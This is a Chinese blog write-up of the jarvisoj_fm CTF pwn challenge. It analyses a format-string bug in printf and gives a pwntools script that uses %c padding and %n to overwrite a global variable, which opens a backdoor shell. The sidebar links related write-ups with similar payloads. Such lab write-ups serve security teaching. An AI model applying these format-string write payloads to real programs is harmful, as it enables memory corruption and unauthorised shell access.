【CTF】jarvisoj_fm 1

最新推荐文章于 2023-04-13 16:42:06 发布
最新推荐文章于 2023-04-13 16:42:06 发布
阅读量524 收藏 1
点赞数
分类专栏: CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/125632558
版权

解题思路

反编译,查找漏洞

undefined4 main(void)
{
  int iVar1;
  undefined4 *puVar2;
  int in_GS_OFFSET;
  byte bVar3;
  undefined4 local_64 [20];
  int local_14;
  
  bVar3 = 0;
  local_14 = *(int *)(in_GS_OFFSET + 0x14);
  be_nice_to_people();
  iVar1 = 0x14;
  puVar2 = local_64;
  while (iVar1 != 0) {
    iVar1 = iVar1 + -1;
    *puVar2 = 0;
    puVar2 = puVar2 + (uint)bVar3 * -2 + 1;
  }
  read(0,local_64,0x50);
  printf((char *)local_64);
  printf("%d!\n",x);
  if (x == 4) {
    puts("running sh...");
    system("/bin/sh");
  }
  if (local_14 != *(int *)(in_GS_OFFSET + 0x14)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

从题目来看,意图很明显,因为后门就在条件判断的地方

  if (x == 4) {
    puts("running sh...");
    system("/bin/sh");
  }

那可利用的点,很明显,有一个read函数,local_64长度为20,但是限制为0x50,是可以溢出利用的。是不是很简单?
(经过多次毒打之后,我已经没那么乐观了)

read(0,local_64,0x50);

OK,先按这个思路去溢出下试试,看看是否能够直接改写返回地址,果然,最大长度,也无法到达返回地址。看下汇编代码:

                     undefined main(undefined param_1, undefined4 param_2)
0804854d 55              PUSH       EBP
0804854e 89 e5           MOV        EBP,ESP
08048550 57              PUSH       EDI
08048551 53              PUSH       EBX
08048552 83 e4 f0        AND        ESP,0xfffffff0
08048555 83 c4 80        ADD        ESP,-0x80

函数进来就有个抬栈的动作,0x50够不到返回地址也就正常了。
继续寻找,发现printf函数,直接使用输入作为输出,可以利用格式化漏洞%n。

printf((char *)local_64);

再结合进入后门的判断条件x==4, 基本可以确定题目思路是利用%n改写x的值,从而进入后门分支。

解题过程

接下来就要确定字符串输入了,先看下printf的时候栈的构造:

0000| 0xffffd280 --> 0xffffd2ac ("%c%c...") -- 1
0004| 0xffffd284 --> 0xffffd2ac ("%c%c%...") -- 2
0008| 0xffffd288 --> 0x50 ('P')
0012| 0xffffd28c --> 0xc2
0016| 0xffffd290 --> 0x0
0020| 0xffffd294 --> 0xc30000
0024| 0xffffd298 --> 0x0
0028| 0xffffd29c --> 0xffffd3a4 --> 0xffffd500 (".../jarvisoj_fm/fm")
0032| 0xffffd2a0 --> 0x0
0036| 0xffffd2a4 --> 0x0
0040| 0xffffd2a8 --> 0x38 ('8')
0044| 0xffffd2ac ("%c%c%...")               -- 3

其中1处为printf入参,2开始就是可以利用的栈上参数,3处为local_64的栈上地址。2~3之间参数距离为10.
OK,到这里需要解决的点就比较清楚了:
1 构造的字符串,需要吞掉前面10个参数,同时吞掉自己的空间占用,最终为%n的写入创造条件
2 x全局变量的定义为3,根据1的分析,无论如何,输出长度都会大于10,如何将x修改为4?

 0804a02c 03 00 00 00     undefined4 00000003h

解决这两个问题费了我不少时间,走了不少弯路,不是一般菜。
对于第一个问题,选择使用%c来吞掉确定的参数(%p等长度都不确定),用限制宽度的方式%宽度x,来补齐需要的长度,长度待定。
对于第二个问题,如果直接修改0804a02c,没办法修改为4。但是小端序的情况,往前一个字节,是有可能的。

0804a02b 00 04 00 00 --> 0804a02c 04 00 00 00

即将0804a02b修改为0x0400,也就是%n输出长度为1024,就能达成。
那就剩下最后一个问题,需要多少个%c来吞掉参数,抽象一下:

 %c长度为2    %widthx宽度占用为4字节(1024)          %n长度为2           0804a02b地址长度为4            总长度应为4的整数倍
     2x            +      6                                               +        2                  +                  4                            =            4y 

参见栈构造2~3之间的距离       输入字符串长度(%4)的占用      %c吞掉的参数       %widthx吞掉的参数         %n吞掉的参数
   10                     +            y                =    x       +          1               +          1

算一下公式,x=22,y=14,with=1024-22=1002
OK,到这基本大功告成了。

解题脚本

  1 from pwn import *
  3 elf = ELF('fm')
  4 #libc = ELF('libc-2.27.so') # 根据环境不同进行替换
  5
  6 context(arch = 'amd64', os = 'linux',log_level = 'debug', terminal="/bin/sh")
  7
  8 #asm()将接受到的字符串转变为汇编码的机器代码,而shellcraft可以生成asm下的shellcode
  9 #shellcode=asm(shellcraft.amd64.linux.sh())
 10 #print(len(shellcode))
 11 #print(shellcode)
 12
 13 sh = process('./fm')
 14 #sh.recvuntil('story!\n')
 15
 16 x_address = 0x0804a02b
 17 #pad = '%x'* 21 + '%n'
 18 pad = '%c' * 22 + '%1002x'  + '%n'
 19 payload = pad.encode() +  p32(x_address)
 20 sh.sendline(payload)
 21
 26
 27 with open('payload.txt', 'wb') as f:
 28    f.write(payload)
 29    #f.write(b'\n\n\n\n')
 30    #f.write(payload1)
 31
 32
 33 sh.sendline(payload)
 34
 35 sh.interactive()

总结

上面算长度的公式,折腾了好久,折腾完发现挺简单,还挺有成就感,但是过程挺折磨,可能还是脑子不习惯数学公式很久了吧,该复习高数或者算法了?

delta_hell
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_fm
m0_52231248的博客
11-15 463
jarvisoj_fm Checksec: Ida: 很明显的格式化字符串漏洞并且我们将x修改为4程序就会给我们调用system函数 偏移gdb .%p都能确定,利用方式%$n,pwntools的fmstr模块都行可以看我之前写的pwn5 的wp有详细说 Exp: Flag: ...
BUU刷题-Pwn-jarvisoj_fm
一个啥也不会的小菜鸡!
07-11 205
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 213
BUUCTF 做题练习
jarvisoj_fm【BUUCTF
qq_41696518的博客
08-31 287
jarvisoj_fm【BUUCTF
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 207
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
MFOJ #353. Hello, World!
Jacky0513z的博客
10-15 354
Hello, World!
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3530
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 384
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
【BUUCTFjarvisoj_fmjarvisoj_tell_me_something
m0_51251108的博客
12-29 175
【BUUCTFjarvisoj_fm 格式化字符串 exp: from pwn import* r=remote('node3.buuoj.cn',27988) x=0x0804A02C offest=11 payload=p32(x)+'%11$n' payload=payload.ljust(0x50,'p') r.send(payload) r.interactive() 【BUUCTFjarvisoj_tell_me_something 栈溢出 exp: from pwn import* r=
(Jarvis Oj)(Pwn) fm
Nothing
06-18 1247
(Jarvis Oj)(Pwn) fm 查看保护。 ida查看程序逻辑。 第12行,很明显的格式化字符串漏洞,当全局变量x的值是4的时候会执行system函数,查看x的值。 x的值是3。所以就要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第...
BUUCTFjarvisoj_fm(write up)
qq_44768749的博客
08-24 315
BUUCTFjarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
jarvis oj fm writeup
ditto的博客
01-05 328
格式化字符串漏洞简单利用 32位程序。 canary和nx都打开了。 放ida里: 直接打印的buf,很明显的格式化字符串漏洞。 用%n,将其修改为4即可,exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9895") payload=p32(0x0804A02C)+"%11$n" a.sendline(payload) a....
JarvisOJ PWN fm wp
苗_的博客
01-24 311
fm 拿到之后首先ida一下,看一下主函数,找漏洞点: 然后就发现第10行是一个很简单的格式化字符串漏洞,看一下x的内存地址: x的值是3,所以要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第几个参数来确定[i]的值,由于x_addr在32位程序...
Crypto_30_vHsm_Types.h
最新发布
07-09
Crypto_30_vHsm_Types
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。比赛的过程中,参赛选手需要使用各种技术和工具,对其他小队的系统进行攻击,尝试获取对方的旗帜。同时,参赛选手也需要保护自己的系统,防止其他小队进行攻击并窃取自己的旗帜。 ctf_awd_platform提供了一个仿真的网络环境,模拟了现实世界中的网络系统。参赛选手可以在这个环境中进行攻防实战,通过解决各种网络安全问题来提升自己的技能。 ctf_awd_platform不仅能够帮助参赛选手提升网络攻防技术,还能够提高其团队合作能力和解决问题的能力。在比赛中,参赛选手需要与队友紧密配合,共同制定攻击和防御策略,以获取最佳的比赛成绩。 总体而言,ctf_awd_platform是一个能够帮助参赛选手提升网络安全技术和团队合作能力的AWD平台,通过实战演练来提高参赛选手的技能水平,并为他们在网络安全领域的职业发展打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值